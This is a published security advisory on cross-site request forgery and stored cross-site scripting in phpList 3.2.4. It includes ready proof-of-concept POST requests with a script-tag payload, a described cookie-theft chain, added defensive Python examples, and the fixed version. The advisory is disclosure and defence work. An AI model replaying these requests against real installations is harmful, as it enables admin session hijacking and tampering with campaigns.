PHPList 3.2.4 Cross Site Request Forgery / Cross Site Scripting

Posted Jun 1, 2016
Authored by Mickael Dorigny

PHPList version 3.2.4 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | b27a45e55fe8110a04dcdd2c862beb1f

######################################################################
# Exploit Title: PHPList v3.2.4 CSRF/XSS
# Date: 01/06/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: https://www.phplist.com/
# Version: 3.2.4
# Category: CSRF/XSS
######################################################################

PHPList description :
======================================================================
phpList is open-source software for managing mailing lists. It is designed for the dissemination of information, such as newsletters, news and advertising, to a list of subscribers. It is written in PHP and uses a MySQL database to store its data. phpList is free and open-source software subject to the terms of the Affero General Public License (AGPL).

Vulnerabilities description :
======================================================================
phpList version 3.2.4 is affected by multiple vulnerabilities:
- CSRF
- Stored XSS

PoC n°1 : CSRF on Campaign Draft modification
============================================
The draft modification process is vulnerable to a CSRF attack. When using the form, we can see that an anti-CSRF token is included, but it can be removed from the request without causing an error. The only prerequisite to exploit this CSRF is to target an existing Draft ID. This can be done, for example, with a simple script that sends multiple modification requests while incrementing the Draft ID. To modify Draft 5, use the following parameters:

[URL]
http://server/admin/?page=send&id=5
[POSTDATA]
workaround_fck_bug=1&followupto=&subject=MODIFIED_SUBJECT&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=

This vulnerability lets an attacker make an authenticated user change campaign content and alter the user experience.
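The root cause described above is a token check that only runs when the token field is present, so stripping the field skips it. The following is an added example, not phpList code: it contrasts that fail-open pattern with a fail-closed one, using constructed POST bodies modelled on the advisory's parameters. The field name `formtoken`, the session layout and the handler are assumptions for illustration.

```python
import hmac
import secrets


def issue_token(session: dict) -> str:
    """Constructed stand-in for issuing a per-session anti-CSRF token when
    the draft edit form is rendered (assumption: one token per session)."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token


def check_token_fail_open(session: dict, form: dict) -> bool:
    """Weak pattern: the token is validated only when the client sends it.
    Removing the field from the POST body bypasses the check entirely,
    which is the behaviour the advisory describes."""
    if "formtoken" not in form:  # assumed field name
        return True
    expected = session.get("csrf_token", "")
    return hmac.compare_digest(expected.encode(), form["formtoken"].encode())


def check_token_fail_closed(session: dict, form: dict) -> bool:
    """Hardened pattern: a state-changing request with no token, or with a
    token that does not match the session, is rejected. The comparison is
    constant-time so the check does not leak the token byte by byte."""
    expected = session.get("csrf_token")
    supplied = form.get("formtoken")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def handle_draft_save(session: dict, form: dict, check) -> str:
    """Apply the chosen token check to a draft-save POST and report the
    outcome; the draft 'update' itself is only simulated here."""
    if form.get("status") != "draft" or "id" not in form:
        return "bad request"
    if not check(session, form):
        return "rejected: CSRF token missing or invalid"
    return f"draft {form['id']} updated: subject={form['subject']!r}"


def demo() -> dict:
    """Run a legitimate save and a token-stripped (forged) save through
    both checks so the difference is visible side by side."""
    session = {}
    token = issue_token(session)
    # Constructed request bodies; the forged one mirrors the advisory's
    # PoC, where the token field is simply absent.
    legitimate = {"id": "5", "status": "draft",
                  "subject": "Newsletter", "formtoken": token}
    forged = {"id": "5", "status": "draft", "subject": "MODIFIED_SUBJECT"}
    return {
        "weak_legit": handle_draft_save(session, legitimate, check_token_fail_open),
        "weak_forged": handle_draft_save(session, forged, check_token_fail_open),
        "hard_legit": handle_draft_save(session, legitimate, check_token_fail_closed),
        "hard_forged": handle_draft_save(session, forged, check_token_fail_closed),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The design point is that "token present and valid" must be the only path that proceeds; treating an absent token as "nothing to verify" is what turns a protected form into an unprotected one.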

PoC n°2 : Stored XSS on Campaign Draft Name
============================================
The campaign draft name, displayed when listing all campaign drafts, is vulnerable to a stored XSS attack. This means that the injected code is saved in the database and rendered each time an admin/user visits the campaign draft list:
http://server/admin/?page=messages&tab=draft

The following request exploits this vulnerability:

[URL]
http://server/admin/?page=send&id=5
[POSTDATA]
workaround_fck_bug=1&followupto=&subject=DATA"><script>alert("XSS_again")</script>&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=

Note that once this request is submitted, the user is not taken directly to the page that displays the XSS. They have to visit this page: http://server/admin/?page=messages&tab=draft

Through this vulnerability, an attacker could tamper with page rendering, redirect the victim to a fake login page, or capture user credentials such as cookies, and especially the admin's.

Using two simple HTML pages with automatic JavaScript redirection, an attacker can chain these two vulnerabilities: change the campaign draft content so that it displays a JavaScript instruction, then use that JavaScript execution to steal the session cookie or bypass all other anti-CSRF protections of the PHPList installation. The scenario exploiting these two vulnerabilities is presented in the video in the "Additional resources" section.
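PoC n°2 works because the stored subject is written into the draft list page as raw markup. As an added example (not phpList's template code), the block below renders a constructed draft list two ways, once interpolating the stored subject directly and once escaping it at the point of output, and includes a small regression check that flags active markup in rendered output. The table layout and the `contains_active_markup` helper are assumptions for illustration; the second subject is the advisory's own payload.

```python
import html

# Constructed draft records for the demonstration; draft 5 carries the
# payload from the advisory exactly as it would be stored.
DRAFTS = [
    {"id": 4, "subject": "May newsletter"},
    {"id": 5, "subject": 'DATA"><script>alert("XSS_again")</script>'},
]


def render_draft_list_vulnerable(drafts) -> str:
    """Interpolates the stored subject straight into HTML. Whatever was
    saved is emitted as markup, which is the stored-XSS pattern."""
    rows = [
        f'<tr><td>{d["id"]}</td>'
        f'<td><a href="?page=send&id={d["id"]}">{d["subject"]}</a></td></tr>'
        for d in drafts
    ]
    return "<table>" + "".join(rows) + "</table>"


def render_draft_list_hardened(drafts) -> str:
    """Escapes every untrusted value at output time. quote=True also
    escapes the double and single quote, so the value is safe inside an
    attribute as well as in element text. The id is coerced to int rather
    than escaped because it is used in an integer context."""
    rows = []
    for d in drafts:
        draft_id = int(d["id"])
        subject = html.escape(str(d["subject"]), quote=True)
        rows.append(
            f"<tr><td>{draft_id}</td>"
            f'<td><a href="?page=send&amp;id={draft_id}">{subject}</a></td></tr>'
        )
    return "<table>" + "".join(rows) + "</table>"


def contains_active_markup(rendered: str) -> bool:
    """Crude template regression check: a raw <script tag or inline event
    handler in output built from untrusted data is a red flag. It is a
    smoke test, not a substitute for contextual escaping."""
    lowered = rendered.lower()
    return ("<script" in lowered
            or " onerror=" in lowered
            or " onload=" in lowered)


if __name__ == "__main__":
    print("vulnerable:", render_draft_list_vulnerable(DRAFTS))
    print("hardened:  ", render_draft_list_hardened(DRAFTS))
```

The hardened renderer is context-aware: the subject is escaped for the HTML text/attribute context it lands in, and the id is type-constrained instead. That is the general fix for stored XSS regardless of where the value was saved, since storage-time filtering cannot know every context the value will later be rendered in.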

Solution:
======================================================================
- Update your PHPList installation to a newer version (3.2.5 - https://www.phplist.org/newslist/phplist-3-2-5-whats-new/)

Additional resources :
======================================================================
- https://youtu.be/cU6ob4sCKgs
- https://www.phplist.org/newslist/phplist-3-2-5-whats-new/

Report timeline :
======================================================================
2016-05-11 : Advisory submitted to editor
2016-05-26 : Version 3.2.5 released with fixes
2016-06-01 : Public Advisory release

Credits :
======================================================================
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/

--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr